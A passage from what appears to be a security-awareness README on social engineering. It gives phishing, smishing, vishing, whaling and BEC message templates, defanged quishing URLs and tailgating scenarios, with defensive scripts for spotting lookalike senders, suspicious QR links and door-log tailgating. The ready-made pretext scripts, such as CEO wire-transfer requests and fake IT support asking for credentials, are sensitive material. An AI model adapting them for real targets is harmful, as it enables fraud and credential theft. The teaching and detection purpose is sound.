2. Unexpected Package

  • Subject Line:
    "You have a package waiting for you! Track it now."
  • Description:
    The attacker entices the victim with the promise of an unknown package, creating a sense of urgency. The link could direct them to a phishing page requesting personal information.

3. Suspicious Activity Alert

  • Subject Line:
    "Your account shows suspicious activity! Click here to secure your account."
  • Description:
    A message that creates fear and curiosity around potential account issues, prompting the victim to click on the link to resolve it.

4. Who Viewed Your Profile

  • Subject Line:
    "Someone just viewed your profile! See who it is."
  • Description:
    A typical curiosity trap where the victim wants to know who's interested in them. The link leads to a fake login page designed to steal credentials.

5. Missing Payment Notification

  • Subject Line:
    "We couldn’t process your payment. Check the details."
  • Description:
    Victims are tricked into opening the email, thinking there's a problem with a recent transaction. This could be a phishing attempt for banking or credit card details.

6. Important Document

  • Subject Line:
    "You’ve received a new important document."
  • Description:
    This uses curiosity around official or urgent matters. The link may prompt the victim to download an attachment or visit a malicious website.

7. Urgent Security Notice

  • Subject Line:
    "Immediate action required: Security breach detected."
  • Description:
    Creates urgency by claiming a security breach, prompting the victim to click and “secure” their account, often leading to malicious websites.

8. "You’ve Been Tagged!"

  • Subject Line:
    "You’ve been tagged in a new photo!"
  • Description:
    The victim is lured into thinking they've been tagged on social media. Clicking the link leads them to a phishing page or malware download disguised as a social media site.

9. "A Secret Admirer Sent You a Message!"

  • Subject Line:
    "A secret admirer just sent you a message. Find out who!"
  • Description:
    This plays on romantic curiosity and can trick victims into clicking a link that either steals their personal information or infects their device with malware.

10. New Job Opportunity

  • Subject Line:
    "New job opportunity waiting for you! Apply now."
  • Description:
    A tempting job offer could lead to the victim submitting their personal details to a fake site or downloading harmful files.

Trust Exploitation – Using Friendly Tone, Shared Interests, etc.

Description:
Trust exploitation involves gaining a victim's trust by using a friendly tone, building rapport through shared interests, or emotional manipulation. Attackers can exploit the victim’s trust to extract sensitive information, access systems, or perform unintended actions.

Key Elements:

  • Friendly tone and familiarity: Making the target feel comfortable through emotional appeal or shared interests.
  • Creating authority: Establishing trust via insider language or appearing knowledgeable.
  • Building rapport: Establishing common ground, like mutual hobbies or shared work tasks.

Example 1: Friendly Email Approach

Scenario: An attacker targets an employee in the marketing department by posing as an old friend from college.

Example Email:

"Hey [Target’s Name],
Long time no see! I hope you’re doing well. I was going through some of my old files and came across some of our college memories. It reminded me how you always knew how to handle marketing campaigns.
I’m currently working with a client who could really benefit from your expertise. Would love to get your thoughts on their strategy. Here’s a link to the draft I’ve been working on. Let me know what you think!
Cheers,
[Attacker’s Name]"

Goal: The target clicks on the link (which delivers malware) because they trust the friendly tone and the apparent mutual connection.


Example 2: Mutual Interest – Sports Teams or Hobbies

Scenario: An attacker connects with someone on LinkedIn based on a shared interest in a sports team or hobby.

Example Message:

"Hey [Target’s Name],
I noticed we’re both huge [Team Name] fans! I went to the game last weekend and had a blast. Looks like we’re finally getting some momentum this season, right?
By the way, I’m also in the IT industry, and I wanted to reach out since we’re both in the same space. I’d love to chat more about how [Company Name] is handling [specific tech challenge]. Let me know if you’re free to talk sometime this week!
Best,
[Attacker’s Name]"

Goal: The attacker builds a friendly connection through the shared hobby, making the target more likely to trust and engage with the attacker. This might lead to them sharing sensitive company details in the conversation.


Example 3: Building a Fake Relationship – Tech Support Impersonation

Scenario: An attacker impersonates a friendly tech support agent reaching out to an employee.

Example Call:

"Hi [Target’s Name],
This is [Attacker’s Name] from IT support. We’ve been working closely with your department to improve system security, and I just wanted to check in to see how everything’s going.
I noticed you might have some pending system updates that need to be installed. I can walk you through the process if you’d like! It’ll only take a few minutes. Just need to get your login credentials to start. It’s a simple procedure to make sure your account is fully protected!"

Goal: The attacker sounds friendly and knowledgeable, creating a false sense of trust. The victim is more likely to share their login credentials under the guise of routine maintenance.


Example 4: Exploiting Emotional Vulnerability – Birthday Greetings

Scenario: An attacker, who has been following the target’s social media, learns that the target's birthday is coming up.

Example Message:

"Hi [Target’s Name],
I saw on Facebook that your birthday is coming up – Happy Early Birthday! I wanted to get you something special, and I was thinking about sending you a little surprise gift. To make sure I’ve got the right address, could you confirm it for me? I’d love to send something you’d really enjoy. Looking forward to celebrating with you!
Best wishes,
[Attacker’s Name]"

Goal: The attacker exploits the emotional connection (birthday) to manipulate the target into revealing personal information, such as their home address.


Example 5: Impersonating a Coworker for Info Exchange

Scenario: The attacker pretends to be a colleague to request confidential information.

Example Email:

"Hi [Target’s Name],
It’s [Attacker’s Name] from the finance team. I hope you’re doing well! I’m currently reviewing some of our financial data for this quarter, and I was wondering if you could send me the latest expense report from last month. I’ve been so swamped with deadlines, and it’d save me a ton of time!
Thanks so much!
[Attacker’s Name]"

Goal: The attacker uses a tone of friendliness and urgency, making the request seem normal and reasonable. The target, seeing the familiar name, might be more willing to share sensitive files without questioning.


🐋 Whaling – Targeting High-Value Individuals

Whaling is a sophisticated form of spear phishing that targets high-profile individuals, such as CEOs, CFOs, executives, and other key decision-makers within an organization. Unlike regular phishing, which may target a broader audience, whaling is specifically designed to exploit the trust and authority of high-ranking officials in order to gain access to sensitive information, steal funds, or compromise the organization.

Key Characteristics of Whaling:

  • Highly Personalized: Whaling attacks are usually tailored with specific details about the individual or company to make the attack look legitimate.
  • Authority-Based: The attacker often impersonates someone in a position of authority, such as a senior executive, lawyer, or government official.
  • Targeting High-Value Victims: High-profile individuals, especially those with access to critical company assets, are the main targets.

Examples of Whaling Attacks

1. Fake CEO Email Asking for Money Transfer

  • Scenario: A cybercriminal impersonates the CEO of a company and sends an email to the CFO with an urgent request for a wire transfer.

  • Email Content:

    “Hi [CFO],
    I need you to urgently wire $500,000 to a client account today. This is extremely confidential, and I can’t discuss it over the phone. Please handle this right away and send me confirmation as soon as possible.
    Regards,
    [Fake CEO Name]”

  • Goal: The CFO believes the request is legitimate and proceeds with the wire transfer, which is intercepted by the attacker.

2. Fake Legal Notice from a Regulatory Authority

  • Scenario: An attacker impersonates a legal or regulatory authority (e.g., tax office) and sends a fake legal notice to the CEO or legal team.

  • Email Content:

    “Dear [CEO Name],
    We have received a report indicating that your company has failed to comply with recent regulatory updates. Please review the attached document for more details.
    Immediate action is required, and failure to do so will result in penalties.
    Regards,
    [Fake Name], Regulatory Officer, [Fake Regulatory Agency Name]”

  • Goal: The victim opens the attachment containing malware or provides sensitive data in response.

3. Fake Tax Document from IRS or Tax Authorities

  • Scenario: The attacker impersonates a tax authority (e.g., IRS) and emails the CFO or financial director about an urgent tax issue.

  • Email Content:

    “Dear [CFO],
    Our records show that your company has an outstanding tax balance. Please review the attached statement and remit payment immediately to avoid penalties.
    Regards,
    [Fake Tax Officer Name], IRS Tax Department”

  • Goal: The victim downloads an infected attachment or clicks on a phishing link.

4. Fake Job Offer or Contract

  • Scenario: An attacker impersonates a high-ranking official (e.g., HR director) and emails the target with a fake job offer.

  • Email Content:

    “Dear [Target Name],
    We are pleased to inform you that you have been selected for a position with our company. To proceed, kindly sign the attached contract document, and we will send further instructions.
    Regards,
    [Fake HR Director Name]”

  • Goal: The victim clicks on a malicious attachment or provides sensitive personal information.

5. Invoice Scam (Impersonating a Trusted Partner)

  • Scenario: The attacker impersonates a business partner or vendor, sending a fake invoice to the executive or accounting team.

  • Email Content:

    “Dear [CFO Name],
    Attached is the invoice for the products/services delivered last month. Kindly make payment by the due date to avoid a disruption in services.
    Regards,
    [Fake Partner Name]”

  • Goal: The victim pays the fraudulent invoice, which is intercepted by the attacker.

6. Fake Press Release or Media Coverage

  • Scenario: The attacker impersonates a media outlet or press agency, sending an email to the CEO claiming they have been featured in an important article.

  • Email Content:

    “Dear [CEO],
    We are pleased to inform you that your company has been selected for an exclusive feature in [Fake Media Outlet Name]. Kindly review the attached document for approval before we go to print.
    Regards,
    [Fake Editor Name], [Fake Media Outlet Name]”

  • Goal: The victim opens the document, which contains a malicious link or document with embedded malware.


Smishing – Phishing via SMS

Smishing (SMS Phishing) is a type of social engineering attack where attackers send fraudulent text messages (SMS) to trick recipients into revealing sensitive information like passwords or credit card numbers, or into installing malware on their devices.

Below are some real-world Smishing examples to help you understand how attackers use this technique:


Example 1: Fake Bank Alert

  • Message:
    "Alert: Your bank account has been compromised. To secure your account, click the link and verify your identity: [malicious_link]"

  • Impact:
    The user clicks the link, leading to a fake login page that steals banking credentials.


Example 2: Package Delivery Scam

  • Message:
    "Your package is waiting for delivery. To reschedule, click here: [malicious_link]"

  • Impact:
    The link either asks for personal details or installs malware upon clicking.


Example 3: Prize or Gift Claim

  • Message:
    "Congratulations! You've won a $1000 gift card. Claim your prize now: [malicious_link]"

  • Impact:
    Clicking the link may ask for personal or financial information in exchange for the "prize."


Example 4: Fake Two-Factor Authentication

  • Message:
    "Your Google account is logging in from a new device. To confirm, click here: [malicious_link]"

  • Impact:
    This attempts to phish user credentials, allowing attackers to take control of accounts.


Example 5: Fake Tax Refund

  • Message:
    "The IRS is processing your tax refund. Click the link to receive your refund: [malicious_link]"

  • Impact:
    The link leads to a fraudulent IRS page asking for social security numbers and bank details.


Example 6: Fake Job Offer

  • Message:
    "Great news! You’ve been selected for an interview with [Company]. Click the link to confirm your details and schedule: [malicious_link]"

  • Impact:
    The link collects personal details or spreads malware once clicked.


Example 7: Subscription Renewal Scam

  • Message:
    "Your Netflix subscription is about to expire. Click here to renew your subscription: [malicious_link]"

  • Impact:
    The link redirects the user to a fake login page to steal Netflix credentials.


📞 Vishing – Phishing via Voice Calls

Vishing is a type of phishing attack where attackers impersonate trusted entities via phone calls to steal personal information or money from victims. Here are some common Vishing tactics:

1. Bank Account Verification Scam

  • Scenario:
    An attacker calls a victim, claiming to be from their bank's fraud department. They say there was unusual activity on the victim's account and ask the victim to verify their identity by providing sensitive information.
  • Example Script:

    "Hello, this is Sarah from [Bank Name] Fraud Department. We noticed suspicious activity on your account. To secure your account, please verify your account number and PIN."

2. IRS or Tax Department Scam

  • Scenario:
    The attacker impersonates an IRS agent or tax authority, claiming that the victim owes taxes or has legal issues. They threaten the victim with arrest or legal action if immediate payment isn't made.
  • Example Script:

    "This is Officer James from the IRS. We’ve identified a tax discrepancy under your name. If you don’t make an immediate payment or call us back, you’ll be arrested."

3. Tech Support Scam

  • Scenario:
    The attacker pretends to be from a legitimate tech company (e.g., Microsoft or Apple). They tell the victim their computer is infected with a virus and ask for remote access to fix it or request payment for services.
  • Example Script:

    "Hi, this is Michael from Microsoft Technical Support. Your computer has been infected with a virus. We need to access your computer remotely to fix it. For a one-time fee, we can clean it up."

4. Prize or Sweepstakes Scam

  • Scenario:
    The attacker calls the victim to inform them they've won a large sum of money or a free vacation, but they need to provide personal details, such as bank account information, in order to claim the prize.
  • Example Script:

    "Congratulations! You’ve won a $1,000 gift card in our sweepstakes! Please provide your bank details to verify and receive your prize."

5. Health Insurance Scam

  • Scenario:
    The attacker pretends to be from a health insurance company, claiming the victim is eligible for a new plan or special offer. They request personal details, like Social Security numbers or medical information, to process the "offer."
  • Example Script:

    "This is Laura from [Insurance Company]. We’re offering an upgrade to your health plan, but we need your Social Security number to complete the enrollment process."

6. Utility Bill Scam

  • Scenario:
    The attacker claims to be from the victim’s utility company (electricity, water, etc.) and threatens to shut off services unless the victim makes an immediate payment via wire transfer or gift cards.
  • Example Script:

    "Hi, this is Joe from [Utility Company]. Your payment is overdue, and unless you pay immediately, we’ll disconnect your service. Please make a payment over the phone now."


Angler Phishing: Using Fake Social Media Support Accounts

Description:

Angler phishing is a type of social engineering attack where cybercriminals create fake support accounts on popular social media platforms like Twitter, Facebook, or Instagram. These fake accounts mimic legitimate customer support channels to deceive users into revealing sensitive information or clicking on malicious links.

How it Works:

  1. Impersonation: Attackers create fake support accounts using the same logo, name, and username as official brands or companies.
  2. Luring Users: Fake accounts respond to public complaints or direct messages, appearing as official customer support.
  3. Phishing Message: After initiating contact, attackers ask for personal information or prompt users to download malicious files or visit phishing sites.

Example Scenarios:

1. Fake Twitter Customer Support

  • Scenario:
    A Twitter user posts a complaint:
    "I can't log into my bank account!"
    A fake customer support account (e.g., @BankHelpSupport) replies publicly:
    "Sorry you're having trouble! DM us your account details, and we’ll assist you in getting access."

  • Malicious Outcome:
    Once the user DMs the fake account, they are prompted to provide their account credentials or download a malicious app to "fix" their account.

2. Fake Instagram Customer Support

  • Scenario:
    A user posts about a shipping issue with an online store on Instagram.
    The attacker creates a fake account named @ShopSupportOfficial and comments:
    "Sorry to hear that! Please DM us your order number, and we’ll take care of it."

  • Malicious Outcome:
    After contacting via DM, the user is directed to a phishing page that mimics the real store’s website and is asked to input credit card or personal details.

3. Fake Facebook Customer Service

  • Scenario:
    A Facebook user posts about an issue with their mobile phone provider.
    A fake support account, @MobileHelpOfficial, sends a private message:
    "We see you're experiencing issues! Please reply with your phone number and account info for immediate assistance."

  • Malicious Outcome:
    The user shares their phone number and personal details, which the attacker can then use for further social engineering or sell on the dark web.


Business Email Compromise (BEC)

Definition:

Business Email Compromise (BEC) is a form of cybercrime where attackers impersonate company executives or trusted partners to deceive employees into transferring funds, providing sensitive information, or performing unauthorized actions. BEC attacks typically involve email spoofing or hacking legitimate business email accounts.


Common BEC Techniques

1. Executive Impersonation

  • Description: Attackers impersonate a high-ranking official (e.g., CEO, CFO) and request transfers of funds or sensitive data.
  • Example:
    • Subject: "URGENT: Transfer Funds to Secure Account"
    • Email Body:

      "Hi [Employee's Name], I hope you're doing well. We are closing a significant deal and need to transfer $50,000 to our supplier right away. Please process the payment ASAP. Let me know once it is done."

    • The attacker uses a similar email address (e.g., ceo@company.com vs. ceo@company.net).

2. Vendor Impersonation

  • Description: The attacker impersonates a vendor and asks for a change in payment details.
  • Example:
    • Subject: "Updated Payment Information for Invoice #1023"
    • Email Body:

      "Dear Accounts Team,
      Please note, we've updated our payment details. Kindly use the following account for all future payments. Attached is the new bank account information. Thank you for your cooperation."

    • This email mimics the tone and format of legitimate vendor communications.

3. Wire Transfer Request

  • Description: The attacker requests an immediate wire transfer for a supposed business transaction.
  • Example:
    • Subject: "Important: Wire Transfer Request"
    • Email Body:

      "Hi [Employee's Name],
      I’m tied up in a meeting, and I need you to urgently process a transfer of $100,000 to the account in the attached document. The funds are for a strategic acquisition, and it must be done today."

    • The attacker may attach a fake invoice or document that looks legitimate.

4. Email Spoofing with Social Engineering

  • Description: The attacker spoofs the email address of a trusted colleague or business partner to manipulate the target.
  • Example:
    • Subject: "Re: Quick Approval Needed for Payment"
    • Email Body:

      "Hey [Employee's Name],
      Can you please approve this wire transfer quickly? It’s urgent. The document is attached. Let me know once done. Thanks."

    • The attacker impersonates a familiar colleague and even attaches fake documentation to seem convincing.
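The lookalike-sender pattern above (ceo@company.com vs. ceo@company.net, plus a familiar display name on an external address) is mechanical enough to check automatically at the mail gateway. The following is an added detection example, not code from this repository; the internal domain, the executive list and the sample From headers are constructed for illustration.

```python
"""Flag inbound mail whose From header imitates an internal sender.
Added example, not part of the original repository. The organisation
data below (INTERNAL_DOMAIN, EXECUTIVE_NAMES) is constructed."""
from email.utils import parseaddr

# Assumed organisation data (constructed for the example).
INTERNAL_DOMAIN = "company.com"
EXECUTIVE_NAMES = {"jane doe": "ceo@company.com"}


def levenshtein(a: str, b: str) -> int:
    """Edit distance between two strings; catches one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def split_domain(domain: str):
    """Return (second-level label, tld) for a simple two-label domain."""
    labels = domain.lower().rsplit(".", 1)
    return (labels[0], labels[1]) if len(labels) == 2 else (domain.lower(), "")


def check_sender(from_header: str) -> list:
    """Return the reasons a From header looks like BEC impersonation (empty list = none)."""
    display, addr = parseaddr(from_header)
    if "@" not in addr:
        return ["unparseable From address"]
    domain = addr.lower().rsplit("@", 1)[1]
    reasons = []
    if domain == INTERNAL_DOMAIN:
        return reasons  # genuinely internal; this check has nothing to add

    # Rule 1: same registered name, different TLD (company.com vs company.net).
    int_sld, int_tld = split_domain(INTERNAL_DOMAIN)
    sld, tld = split_domain(domain)
    if sld == int_sld and tld != int_tld:
        reasons.append(f"same name, different TLD: {domain} vs {INTERNAL_DOMAIN}")
    # Rule 2: near-miss spelling of the internal domain (cornpany.com).
    elif levenshtein(domain, INTERNAL_DOMAIN) <= 2:
        reasons.append(f"lookalike domain (edit distance <= 2): {domain}")

    # Rule 3: an executive's display name arriving from any external domain.
    if display.strip().lower() in EXECUTIVE_NAMES:
        reasons.append(f"display name '{display}' matches an executive but domain is external")
    return reasons


if __name__ == "__main__":
    # Constructed sample headers, one per rule plus a clean vendor address.
    for hdr in ("Jane Doe <ceo@company.net>", "Bob <bob@cornpany.com>",
                "Vendor <billing@supplier.org>", "Jane Doe <ceo@company.com>"):
        print(hdr, "->", check_sender(hdr) or "ok")
```

Messages that trip any rule are candidates for quarantine or an external-sender banner rather than an automatic reject, since legitimate partners do occasionally use similar names.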

Social Media Recon – Using Public Profiles to Craft Believable Lures

Description:

Social media platforms (e.g., Facebook, LinkedIn, Twitter) provide attackers with valuable public information that can be used to craft highly convincing lures for phishing, spear-phishing, or impersonation attacks. By gathering personal and professional details from public profiles, attackers can design messages that are more likely to deceive the target into divulging sensitive information or clicking on malicious links.


Techniques and Examples:

💼 Example 1: LinkedIn Spear Phishing

  • Step 1: The attacker identifies a target employee on LinkedIn, who works in the finance department of a large company.
  • Step 2: The attacker finds out from the target’s profile that they recently completed a company-wide audit.
  • Step 3: The attacker crafts an email posing as the company's auditing team, thanking the target for their contribution and asking them to review the final audit document via an embedded link.
  • Step 4: The link leads to a phishing page designed to capture the victim’s login credentials.

📱 Example 2: Facebook Friendship Exploitation

  • Step 1: The attacker examines the victim’s Facebook profile and identifies a close relationship with a mutual friend.
  • Step 2: The attacker sends a message to the victim, pretending to be their mutual friend, saying: “Hey, I found something awesome, check this link, it’s important!”
  • Step 3: The link leads to a fake login page or malicious download, disguised as something the victim would find interesting.

📧 Example 3: Twitter Impersonation

  • Step 1: The attacker finds a Twitter account of a high-profile individual or company and observes their regular tweets.
  • Step 2: The attacker creates a fake account mimicking the style and tone of the real individual.
  • Step 3: The attacker tweets to the victim: “Hi, I heard you're attending the XYZ event! I’ve got your special access pass ready! DM me to confirm details.”
  • Step 4: The victim clicks a malicious link to provide personal details or login credentials.

💻 Example 4: Instagram Scam via Fake Charity

  • Step 1: The attacker browses the victim’s Instagram and sees that they are passionate about charity work and post about attending charity events or supporting non-profits.
  • Step 2: The attacker creates a fake charity organization Instagram account, using stolen images and descriptions.
  • Step 3: The attacker posts: “We're hosting a charity gala next week. We’re raising funds for XYZ cause and could use your help to get the word out!” The victim is encouraged to share the post and click a donation link.
  • Step 4: The donation link leads to a fake payment page designed to collect financial information.

🧠 Malicious QR Codes (Quishing) - Social Engineering Technique

Malicious QR codes, used in an attack known as Quishing, are a social engineering technique in which attackers trick victims into visiting malicious websites or downloading malware by disguising dangerous URLs as QR codes. These are often placed in public spaces, shared via email, or embedded in posters, pretending to be legitimate services like payments, Wi-Fi access, or event check-ins.


📌 What is Quishing?

Quishing is the practice of replacing legitimate QR codes with phishing or malware-delivery links. Victims scan these codes using their smartphones, believing them to be trustworthy (e.g., for menus, payments, or check-ins), but are silently redirected to malicious content.


⚠️ How It Works

  1. Attacker generates a QR code pointing to a malicious or phishing URL.
  2. They print it and place it in high-traffic areas (like cafes, parking meters, conference halls).
  3. Victims scan it with their phone's camera.
  4. The QR code redirects them to:
    • A fake login page
    • A malware download
    • A form to steal personal data

🧪 Examples

✅ Example 1: Fake Payment QR

  • Context: On a parking meter or restaurant table.
  • URL: http://paypal-login.paymnt-verify[.]com
  • Trick: Victim is asked to log into “PayPal” and enters real credentials.

✅ Example 2: Fake Wi-Fi QR Code

  • Context: Free Wi-Fi QR in a coffee shop.
  • URL: http://freewifi-coffeeshop[.]info
  • Trick: Leads to a fake Wi-Fi login page stealing Google/Facebook logins.

✅ Example 3: Fake App Download

  • Context: Poster claiming to offer a “COVID-19 tracking app” or “banking app”.
  • URL: http://get-bankapp-download[.]cc
  • Trick: Victim downloads a malicious APK file on Android or visits a phishing site.

✅ Example 4: Event Check-In QR

  • Context: Fake check-in banner at an event or tech conference.
  • URL: http://event-attendee-checkin[.]xyz
  • Trick: Harvests names, email addresses, and company details for future attacks.
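The four URLs above share the traits a scanner app or a mail gateway can check before anyone opens the page: a brand name sitting on a domain the brand does not own, lure words such as "login" or "verify" in the hostname, and plain http. The following is an added triage example, not code from this repository; the brand allowlist is assumed and the payloads are the page's own defanged URLs plus a constructed legitimate one.

```python
"""Triage decoded QR payloads before they are opened.
Added example, not part of the original repository. BRAND_DOMAINS and the
sample payloads in main() are constructed for illustration."""
from urllib.parse import urlsplit

# Assumed: brands we care about and the domains they legitimately use.
BRAND_DOMAINS = {
    "paypal": {"paypal.com"},
    "google": {"google.com"},
}
# Words that appear in lure hostnames far more often than in real ones.
SUSPECT_WORDS = ("login", "verify", "download", "checkin", "wifi")


def refang(text: str) -> str:
    """Undo the [.] and hxxp defanging used when indicators are shared."""
    return text.replace("[.]", ".").replace("hxxp", "http")


def registrable(host: str) -> str:
    """Last two labels of a host; sufficient for the two-label domains used here."""
    return ".".join(host.lower().split(".")[-2:])


def triage_qr(payload: str) -> list:
    """Return the reasons a decoded QR payload deserves suspicion (empty list = none found)."""
    url = refang(payload.strip())
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if parts.scheme not in ("http", "https") or not host:
        # Wi-Fi, vCard and plain-text payloads are not web links; handle separately.
        return ["payload is not an http(s) URL"]
    reasons = []
    if parts.scheme == "http":
        reasons.append("cleartext http")
    reg = registrable(host)
    # Brand keyword present, but the registrable domain is not one the brand owns.
    for brand, owned in BRAND_DOMAINS.items():
        if brand in host and reg not in owned:
            reasons.append(f"'{brand}' in hostname but domain is {reg}")
    # Lure vocabulary in the hostname itself (hyphens removed so 'free-wifi' still matches).
    hits = [w for w in SUSPECT_WORDS if w in host.replace("-", "")]
    if hits:
        reasons.append("lure words in hostname: " + ", ".join(hits))
    return reasons


if __name__ == "__main__":
    samples = (
        "http://paypal-login.paymnt-verify[.]com",   # page's Example 1
        "http://freewifi-coffeeshop[.]info",          # page's Example 2
        "http://get-bankapp-download[.]cc",           # page's Example 3
        "https://www.paypal.com/signin",              # constructed legitimate URL
    )
    for s in samples:
        print(s, "->", triage_qr(s) or "no findings")
```

An empty result is not a clean bill of health; it only means none of these cheap heuristics fired, so the URL should still be shown to the user in full before it is opened.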

🎭 Fake Surveys and Forms – Social Engineering Technique

Fake surveys and forms are a common yet dangerous form of social engineering used by attackers to trick users into revealing sensitive information, such as login credentials, personal identity data, or even financial details. These attacks often appear legitimate and use trusted branding or internal-looking templates to lure victims.


🚨 What is it?

Fake Surveys/Forms involve:

  • Sending links to fraudulent login pages, questionnaires, or giveaway surveys.
  • Masquerading as trusted sources (Google, HR teams, government health departments, etc.).
  • Collecting private data under false pretenses.

🎯 Purpose

Attackers use this technique to:

  • Steal credentials
  • Harvest Personally Identifiable Information (PII)
  • Collect answers to common security questions
  • Deploy malware via redirect links

🧪 Examples

📄 Example 1: Fake Google Docs Login

A user receives a message:

"You've been tagged in a document – click to view."

They’re redirected to a fake login page:

https://secure-gdoc-access.com/login

Once credentials are entered, they’re sent to the attacker.


🧑‍💼 Example 2: HR Feedback Form

A corporate user gets:

"We’re collecting anonymous manager feedback. Fill out this quick form."

The form asks for:

  • Name
  • Email
  • Office 365 credentials for ‘verification’

🎁 Example 3: Giveaway Survey

Seen on social media or WhatsApp:

"🎉 Win a free iPhone 15 – Complete our survey!"

The survey collects:

  • Personal details
  • Credit card info for "shipping"
  • Uploaded ID documents

🦠 Example 4: COVID-19 Scam Survey

Fake health departments asked users to:

"Book your free vaccine by filling out this form."

This was used to steal identities during the pandemic.


🎭 Fake Job Offers – Social Engineering via LinkedIn

📌 Overview

Fake job offers are a popular social engineering technique used by attackers to gain trust, steal sensitive personal information, or deliver malware. These scams are often executed on professional networking sites like LinkedIn, where attackers pretend to be recruiters from reputed companies.


🎯 Goal of the Attack

  • Steal personal data like resume, phone number, address, etc.
  • Deliver malicious files (usually documents with macros)
  • Harvest credentials through fake login portals
  • Perform identity theft or targeted spear-phishing

🧠 How It Works

  1. Create a convincing fake recruiter profile
    • Poses as HR or a hiring manager from a top company
    • Uses company logos, fake endorsements, and job titles
  2. Reach out to targets via direct messages
    • Offers high-paying or exciting roles
    • Creates urgency to increase the chance of a response
  3. Trick the victim
    • Asks for personal details
    • Sends malware-infected attachments
    • Directs victims to phishing websites

🧪 Realistic Examples

Example 1: Information Theft

"Hi Abhinav, I’m hiring for a Cybersecurity Analyst role at Microsoft India. Based on your experience, you’re a perfect fit. Please send your updated resume, phone number, and current address for background verification. We’re fast-tracking this role."

🎯 Objective: Collect sensitive personal information


Example 2: Malware Delivery

"Hey! We loved your profile and would like to proceed. Please download the attached onboarding form and fill it. Kindly enable editing and macros."

📎 Attached file contains malicious macros to infect the system


Example 3: Credential Harvesting

"To proceed with your job application, please fill out this pre-screening form."
https://malicious-site.in/secure-login

🔗 Link leads to a fake login page mimicking a real platform like Google or HR portals


🎭 Deepfakes & Voice AI in Social Engineering

This section highlights how attackers use AI-generated deepfakes (voice and video) to impersonate trusted individuals and manipulate victims. These advanced social engineering techniques are becoming increasingly common and dangerous in cybersecurity.


🧠 What Are Deepfakes & Voice AI?

  • Voice AI: Uses AI to clone a person’s voice and create convincing fake audio messages or phone calls.
  • Video Deepfakes: Uses AI to mimic someone’s face and voice in videos, often deployed in fake video calls.

🔊 Voice AI Example: CEO Voice Scam

📌 Scenario:
Attackers cloned the CEO’s voice using AI and called the company’s finance officer.

🎯 Objective:
Trick the officer into wiring €220,000 to a fake account.

✅ Result:
The transfer was completed before the scam was discovered.

📰 Source:
WSJ Report – AI Voice Deepfake Fraud


🎥 Video Deepfake Example: Fake Boss on Zoom

📌 Scenario:
Employees joined a fake Zoom call with what looked like their manager.

🎯 Objective:
Convince them to share sensitive files and approve internal transactions.

✅ Result:
Some employees complied before discovering the deception.


🛠️ Tools Used in Attacks

  • Voice Cloning: ElevenLabs, Resemble.ai, Descript Overdub
  • Video Deepfakes: DeepFaceLab, FaceSwap, DeepfakeWeb

🚪 Tailgating – Social Engineering Technique

Tailgating is a physical social engineering method where an attacker gains unauthorized access to restricted areas by following closely behind an authorized person. This technique takes advantage of human kindness, social pressure, or inattention to bypass physical security measures.


🧠 What is Tailgating?

Tailgating (also known as "piggybacking") involves an attacker entering a secure building or room by walking behind someone who has legitimate access, often without raising suspicion.


🔍 Real-World Examples

📦 Example 1: Delivery Disguise

An attacker poses as a delivery person with fake packages. They approach an office entrance and ask, “Could you hold the door? I’ve got my hands full.” An employee, trying to help, opens the door—granting the attacker access.

💼 Example 2: Forgot My Badge

A person dressed professionally waits outside and says, “I forgot my access card—can you let me in?” This simple trick often works, especially in busy environments.

🧽 Example 3: Fake Janitor at Night

Late in the evening, someone dressed as a cleaner follows an employee inside. Since janitors are expected during off-hours, they’re rarely questioned.


Piggybacking

Description:

Piggybacking is a social engineering technique where an attacker gains unauthorized physical access to a restricted area by following an authorized individual through a controlled door. Unlike pure tailgating, the authorized person is usually aware of the attacker: they hold the door or grant access out of politeness, without verifying the attacker’s identity. Controls that break the technique are a turnstile or mantrap that admits one person per badge read, anti-passback rules in the access-control system, and a culture in which asking "can I see your badge?" is normal.


Example:

  1. Scenario:
    An attacker dresses as a delivery person (or any trusted role) carrying a package and approaches a secured building (e.g., office, lab, or server room). They wait for an employee to open the door and either follow them in or ask for assistance.

  2. Execution:
    The attacker may say:

    • “Hi, I’m from the delivery service. Could you please let me in?”
    • Or they simply follow closely behind an employee entering the building without any resistance.
  3. Result:
    Once inside, the attacker may attempt to:

    • Access sensitive systems,
    • Steal documents, or
    • Plant surveillance equipment in restricted areas.
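Tailgating and piggybacking leave traces in door-controller logs even when nobody challenges the intruder: more than one person passing on a single badge read, an entry read for a badge that never exited, a door held open, or a door that opened with no read at all. The script below is an added example written for this README (it is not code from the repository) and shows how to pull those indicators out of a log. The log format ("timestamp,door,event,badge" with events BADGE_IN, BADGE_OUT, DOOR_OPEN, DOOR_CLOSE and PASS) is a hypothetical one, and the sample log is constructed; a real controller exports something similar but vendor-specific.

```python
"""Tailgating / piggybacking indicators from door-controller logs.

Added example for this README, not code from the original repository.
The log format is hypothetical: "timestamp,door,event,badge" with events
BADGE_IN, BADGE_OUT, DOOR_OPEN, DOOR_CLOSE and PASS (one person counted
by a turnstile or beam sensor). SAMPLE_LOG is constructed.
"""
from dataclasses import dataclass
from datetime import datetime

SAMPLE_LOG = """\
2024-03-01T08:00:01,lobby,BADGE_IN,1001
2024-03-01T08:00:02,lobby,DOOR_OPEN,
2024-03-01T08:00:03,lobby,PASS,
2024-03-01T08:00:05,lobby,PASS,
2024-03-01T08:00:07,lobby,DOOR_CLOSE,
2024-03-01T08:30:00,lobby,BADGE_IN,1001
2024-03-01T09:00:00,server,BADGE_IN,1002
2024-03-01T09:00:01,server,DOOR_OPEN,
2024-03-01T09:00:02,server,PASS,
2024-03-01T09:00:45,server,DOOR_CLOSE,
2024-03-01T12:00:00,loading,DOOR_OPEN,
2024-03-01T12:00:01,loading,PASS,
2024-03-01T12:00:03,loading,DOOR_CLOSE,
"""


@dataclass
class Finding:
    kind: str      # TAILGATE, ANTIPASSBACK, DOOR_HELD or NO_BADGE
    door: str
    badge: str
    when: datetime
    detail: str


def parse_log(text):
    """Yield (timestamp, door, event, badge) tuples from the log text."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, door, event, badge = line.split(",")
        yield datetime.fromisoformat(ts), door, event, badge


def _session(sessions, door, ts):
    """Per-door state for the current door-open cycle (created on demand)."""
    return sessions.setdefault(
        door, {"badge": "", "opened_at": None, "passes": 0, "started": ts})


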